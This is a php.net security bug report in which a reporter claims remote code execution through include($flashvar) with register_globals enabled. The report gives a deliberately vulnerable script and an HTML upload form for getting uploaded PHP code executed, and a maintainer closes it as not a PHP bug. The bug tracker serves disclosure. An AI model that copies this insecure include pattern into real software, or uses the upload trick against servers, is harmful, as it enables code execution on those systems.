php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #69058 REMOTE CODE EXECUTION with flash variable in include() function
Submitted: 2015-02-15 20:43 UTC Modified: 2015-02-16 05:24 UTC
From: w at inbox dot ru Assigned:
Status: Not a bug Package: Directory function related
PHP Version: 5.4.37 OS: FreeBSD
Private report: No CVE-ID: None
 [2015-02-15 20:43 UTC] w at inbox dot ru
Description:
------------
REMOTE CODE EXECUTION 

with flash variable 
in include() function when register_globals on

Test script:
---------------
create next files

filename: vuln.php
<?php 
include($flashvar); 
?>


filename .htaccess
php_flag register_globals on

filename:
exploit.html
<!DOCTYPE HTML>
<html>
  <head> </head>
  <body>

<form action="./vuln.php" method=post enctype="multipart/form-data">
<input type="file" name="flashvar">
<input type="submit">
</form>

  </body>
</html>


then open exploit.html and try to opload local file 

info.php
<?php phpinfo(); ?>


and now we can see phpinfo on this server!!!


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-02-16 05:24 UTC] stas@php.net
-Status: Open +Status: Not a bug
 [2015-02-16 05:24 UTC] stas@php.net
Sorry, but your problem does not imply a bug in PHP itself.  For a
list of more appropriate places to ask for help using PHP, please
visit http://www.php.net/support.php as this bug system is not the
appropriate forum for asking support questions.  Due to the volume
of reports we can not explain in detail here why your report is not
a bug.  The support channels will be able to provide an explanation
for you.

Thank you for your interest in PHP.


 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Sat Dec 14 08:01:27 2024 UTC